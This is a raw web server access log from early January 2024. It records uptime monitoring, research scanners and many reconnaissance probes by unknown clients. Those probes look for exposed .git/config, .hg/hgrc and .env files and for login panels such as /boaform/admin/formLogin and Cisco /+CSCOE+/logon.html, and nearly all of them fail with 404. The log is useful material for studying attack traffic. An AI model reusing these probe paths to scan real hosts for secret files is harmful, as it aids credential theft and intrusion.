212.91.246.72 - - [04/Jan/2024:23:33:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.85.24.248 - - [04/Jan/2024:23:33:23 +0100] "GET /dist/.git/config HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Linux; Android 9; SNE-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
3.8.140.82 - - [04/Jan/2024:23:33:55 +0100] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:33:57 +0100] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:34:02 +0100] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Jan/2024:23:34:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:35:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:23:35:17 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:23:35:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:35:29 +0100] "\x16\x03\x01" 501 318 "-" "-"
5.235.189.247 - - [04/Jan/2024:23:35:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:23:36:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:36:23 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:36:27 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:36:34 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Jan/2024:23:37:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:38:10 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:23:38:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:38:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
13.229.95.148 - - [04/Jan/2024:23:38:22 +0100] "GET /doc/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
3.8.140.82 - - [04/Jan/2024:23:38:33 +0100] "\x16\x03\x01" 501 318 "-" "-"
45.95.147.251 - - [04/Jan/2024:23:39:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [04/Jan/2024:23:39:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:39:37 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:39:43 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:39:50 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.85.24.248 - - [04/Jan/2024:23:40:13 +0100] "GET /src/test/.git/config HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:23:40:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:41:08 +0100] "\x16\x03\x01" 501 318 "-" "-"
162.216.149.242 - - [04/Jan/2024:23:41:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
3.8.140.82 - - [04/Jan/2024:23:41:18 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:23:41:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:41:29 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:23:42:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:42:24 +0100] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:42:27 +0100] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:42:33 +0100] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Jan/2024:23:43:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:43:38 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.230 - - [04/Jan/2024:23:43:45 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.230 - - [04/Jan/2024:23:43:45 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:23:43:45 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:23:43:56 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:23:44:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:44:51 +0100] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:44:56 +0100] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:45:03 +0100] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Jan/2024:23:45:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.173.133.244 - - [04/Jan/2024:23:45:37 +0100] "GET /uploads/.git/config HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:23:46:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:46:22 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:23:46:32 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:23:46:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:23:47:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:47:48 +0100] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:47:54 +0100] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:48:01 +0100] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Jan/2024:23:48:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:49:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:49:22 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:23:49:33 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:23:49:42 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:23:50:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.229.95.148 - - [04/Jan/2024:23:50:22 +0100] "GET /modules/.hg/hgrc HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1"
3.8.140.82 - - [04/Jan/2024:23:50:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:50:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:50:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Jan/2024:23:51:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:52:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.79.117.42 - - [04/Jan/2024:23:52:43 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:23:53:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.229.95.148 - - [04/Jan/2024:23:53:36 +0100] "GET /modules/.hg/hgrc HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 OPR/40.0.2308.62"
212.91.246.72 - - [04/Jan/2024:23:54:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.173.133.244 - - [04/Jan/2024:23:54:52 +0100] "GET /backup/.git/config HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; Dillo 3.0)"
212.91.246.72 - - [04/Jan/2024:23:55:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:56:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.85.24.248 - - [04/Jan/2024:23:56:35 +0100] "GET /settings/.git/config HTTP/1.1" 404 325 "-" "SonyEricssonT100/R101"
212.91.246.72 - - [04/Jan/2024:23:57:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:58:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:59:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.229.95.148 - - [05/Jan/2024:00:01:57 +0100] "GET /dist/.git/config HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 YaBrowser/19.7.3.172 Yowser/2.5 Safari/537.36"
3.85.24.248 - - [05/Jan/2024:00:03:09 +0100] "GET /bin/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Linux; Android 9; INE-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
54.173.133.244 - - [05/Jan/2024:00:06:24 +0100] "GET /src/scripts/.git/config HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
3.85.24.248 - - [05/Jan/2024:00:06:41 +0100] "GET /bin/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.80 Safari/537.36"
198.235.24.221 - - [05/Jan/2024:00:07:00 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.221 - - [05/Jan/2024:00:07:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:08:33 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:08:43 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:08:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
175.41.159.251 - - [05/Jan/2024:00:09:13 +0100] "GET /src/.git/config HTTP/1.1" 404 320 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)"
3.8.140.82 - - [05/Jan/2024:00:09:31 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:09:37 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:09:41 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:10:04 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:10:07 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:10:09 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:10:39 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:10:46 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:10:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:11:13 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:11:15 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:11:17 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:12:03 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:12:09 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:12:13 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:12:37 +0100] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:12:42 +0100] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:12:44 +0100] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:13:38 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:13:45 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:13:49 +0100] "\x16\x03\x01" 501 318 "-" "-"
167.94.145.60 - - [05/Jan/2024:00:14:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.60 - - [05/Jan/2024:00:14:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.60 - - [05/Jan/2024:00:14:10 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.60 - - [05/Jan/2024:00:14:10 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
3.8.140.82 - - [05/Jan/2024:00:14:19 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:14:23 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:14:26 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
54.173.133.244 - - [05/Jan/2024:00:15:10 +0100] "GET /dev/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT"
3.8.140.82 - - [05/Jan/2024:00:15:27 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:15:34 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:15:39 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:16:08 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:16:12 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:16:15 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:17:07 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:17:14 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:17:19 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:17:45 +0100] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
45.13.119.147 - - [05/Jan/2024:00:17:47 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
3.8.140.82 - - [05/Jan/2024:00:17:49 +0100] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:17:50 +0100] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:18:37 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.59 - - [05/Jan/2024:00:18:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
3.8.140.82 - - [05/Jan/2024:00:18:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:18:48 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:19:11 +0100] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:19:15 +0100] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:19:16 +0100] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:20:03 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:20:09 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:20:14 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:20:37 +0100] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:20:42 +0100] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:20:43 +0100] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.85.24.248 - - [05/Jan/2024:00:20:49 +0100] "GET /src/scripts/.git/config HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Linux; Android 7.0; Alcatel_5044R) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
3.8.140.82 - - [05/Jan/2024:00:21:37 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:21:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [05/Jan/2024:00:21:49 +0100] "\x16\x03\x01" 501 318 "-" "-"
91.92.254.30 - - [05/Jan/2024:00:22:06 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
91.92.254.30 - - [05/Jan/2024:00:22:06 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
3.8.140.82 - - [05/Jan/2024:00:22:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:22:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [05/Jan/2024:00:22:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
102.129.232.53 - - [05/Jan/2024:00:23:00 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
3.85.24.248 - - [05/Jan/2024:00:25:16 +0100] "GET /files/.git/config HTTP/1.1" 404 322 "-" "W3C_Validator/1.305.2.12 libwww-perl/5.64"
45.13.119.147 - - [05/Jan/2024:00:28:16 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
167.94.146.60 - - [05/Jan/2024:00:28:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.60 - - [05/Jan/2024:00:28:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.60 - - [05/Jan/2024:00:28:58 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.60 - - [05/Jan/2024:00:28:58 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
94.156.67.88 - - [05/Jan/2024:00:29:08 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
94.156.67.88 - - [05/Jan/2024:00:29:08 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
3.85.24.248 - - [05/Jan/2024:00:29:21 +0100] "GET /api/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/535.22+ (KHTML, like Gecko) Chromium/17.0.963.56 Chrome/17.0.963.56 Safari/535.22+ Epiphany/2.30.6"
45.95.147.251 - - [05/Jan/2024:00:33:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
13.229.95.148 - - [05/Jan/2024:00:34:26 +0100] "GET /files/.git/config HTTP/1.1" 404 322 "-" "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16"
198.235.24.92 - - [05/Jan/2024:00:35:29 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.92 - - [05/Jan/2024:00:35:30 +0100] "\x16\x03\x01" 501 318 "-" "-"
13.229.95.148 - - [05/Jan/2024:00:36:01 +0100] "GET /js/.git/config HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Linux; Android 9; ONEPLUS A6003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
45.95.147.251 - - [05/Jan/2024:00:39:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
45.13.119.147 - - [05/Jan/2024:00:39:22 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
35.203.211.183 - - [05/Jan/2024:00:40:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
102.129.232.53 - - [05/Jan/2024:00:41:12 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
175.41.159.251 - - [05/Jan/2024:00:41:30 +0100] "GET /modules/.git/config HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
